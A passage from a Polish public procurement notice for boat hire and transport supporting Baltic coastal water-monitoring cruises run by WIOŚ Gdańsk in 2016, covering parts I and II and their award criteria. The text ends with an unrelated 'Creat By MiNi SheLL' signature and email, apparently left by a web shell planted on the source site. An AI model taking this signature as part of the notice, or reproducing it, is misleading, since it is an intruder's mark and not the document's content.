c)samochód służący do przewozu urządzeń, sprzętu i pracownika(ów) Zamawiającego na jednostki pływające, rano w dniu rejsu z siedziby WIOŚ w Gdańsku lub wieczorem dnia poprzedzającego rejs (w przypadku wyjazdu wieczorem na punkty poboru dnia poprzedzającego rej (pobór). Wykonawca musi zapewnić nocleg i wyżywienie (kolacja) dla przedstawiciela Zamawiającego) oraz transport po odbytym rejsie urządzeń, sprzętu i pracownika(ów) Zamawiającego do siedziby WIOŚ w Gdańsku mieszczącej się przy Trakcie Św. Wojciecha 293 w Gdańsku. W przypadku powrotu po odbytym rejsie po godz. 15:15. dowóz pracownika(ów) Zamawiającego, do jego miejsca zamieszkania na ternie miasta Gdańsk, około 15 km od siedziby WIOŚ,
d)	dowóz próbek w warunkach chłodniczych w temp. ok +4 st. C do siedziby Zamawiającego, maksymalnie w ciągu 24 godzin, od czasu ich poboru, 
12.Wykonawca zobowiązany jest do telefonicznego powiadamiania Zamawiającego, z co najmniej 12 godzinnym wyprzedzeniem, o braku możliwości realizacji planowanego rejsu zgodnie z harmonogramem ze względu na niesprzyjające warunki pogodowe lub inne przyczyny losowe.
13.Wykonawca zobowiązany jest do zapewnienia pomocy pracownikowi Zamawiającego w pracach przy poborze próbek i wykonywaniu badań na pokładzie, polegających w szczególności na: 
- załadunku i rozładunek sprzętu i wyposażenia badawczego na statek,
- obsłudze żurawiku z ręczną wyciągarką do poborników próbek wody,
- obsłudze zwijadła kabloliny sondy wieloparametrowej,
- operowaniu pobornikiem dna przy użyciu żurawia pokładowego, 
- przemywaniu osadów dennych,
- przenoszeniu, pakowaniu oraz innych czynnościach  nie wymienionych powyżej  przy pobieraniu próbek na pokładzie statku.
14.Wykonawca zobowiązany jest do zapewnienia zastępstwa w zakresie jednostki pływającej oraz samochodu do przewozu pracowników Zamawiającego, próbek, urządzeń i sprzętu, które umożliwią realizację części I przedmiotu zamówienia, zgodnie z zaplanowanym harmonogramem, w przypadku zaistnienia czynników losowych - choroby Wykonawcy, awarii samochodu lub jednostki, itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.65.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Doświadczenie Wykonawcy - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> w rejonie Ustki i Rowów - część II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zamawiający planuje zrealizowanie w roku 2016, w okresie od  dnia podpisania umowy do dnia 31.12.2016r., sześciu rejsów (cykli pomiarowych). W każdym miesiącu, w którym zaplanowano badania monitoringowe, w ramach jednego rejsu przeprowadzony zostanie pobór próbek na trzech punktach pomiarowo kontrolnych. W zależności od warunków pogodowych ilość dni rejsowych może ulec zmianie, jak również planowane terminy rejsów  wymienione w (tab.4) załącznik nr 4 do SIWZ.
2.	Wykaz i lokalizację punktów pomiarowo kontrolnych na wodach przybrzeżnych Bałtyku a także harmonogram i częstotliwość rejsów realizowanych przez Delegaturę WIOŚ w Gdańsku, z siedzibą w Słupsku, określa załącznik nr 4 do SIWZ (tab. 4. i tab. 5. oraz ryc.3).
3.	Wykonawca winien zapewnić przy realizacji części II przedmiotu zamówienia:
 podstawową jednostkę pływającą - statek ( jacht motorowy) spełniającą  wymagania opisane ust.3.3 niniejszego rozdziału SIWZ.
4.	Z uwagi na lokalizacje punktów monitoringowych wchodzących w skład części II przedmiotu zamówienia preferowane jest, aby podstawowa jednostka pływająca stacjonowała w porcie w Ustce.
5.	Zamawiający posiada wszystkie niezbędne urządzenia do poboru próbek i badań wykonywanych z jednostki pływającej (czerpacze wody, dna, sita, pojemniki na próbki itp.).
6.	Zamawiający w celu realizacji części II przedmiotu zamówienia, oświadcza iż dysponuje własnym środkiem transportu lądowego (samochodem) do przewozu sprzętu, urządzeń, próbek i pracowników Zamawiającego.
7.	Wykonawca zobowiązany jest do zapewnienia pomocy pracownikowi Zamawiającego w pracach przy poborze próbek i wykonywaniu badań na pokładzie, polegających w szczególności na: 
- załadunku i rozładunek sprzętu i wyposażenia badawczego na statek,
- obsłudze żurawiku z ręczną wyciągarką do poborników próbek wody,
- obsłudze zwijadła kabloliny sondy wieloparametrowej,
- przenoszeniu, pakowaniu oraz innych czynnościach  nie wymienionych powyżej  przy pobieraniu próbek na pokładzie statku
8. Przewiduje się uczestnictwo, w wykonywaniu zadań wynikających z zakresu monitoringu, przez maksymalnie dwóch pracowników Zamawiającego.
9. Wykonawca zobowiązany jest do zapewnienia zastępstwa w zakresie jednostki pływającej, która umożliwi realizację części II przedmiotu zamówienia, zgodnie z zaplanowanym harmonogramem, w przypadku zaistnienia czynników losowych - choroby Wykonawcy, awarii samochodu lub jednostki, itp.
11. Wykonawca zobowiązany jest do telefonicznego powiadamiania Zamawiającego, z co najmniej 12 godzinnym wyprzedzeniem, o braku możliwości realizacji planowanego rejsu zgodnie z harmonogramem ze względu na niesprzyjające warunki pogodowe lub inne przyczyny losowe.
12. Rejsy zaczynać i kończyć się będą w porcie w Ustce..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.65.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Doświadczenie Wykonawcy - 15</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com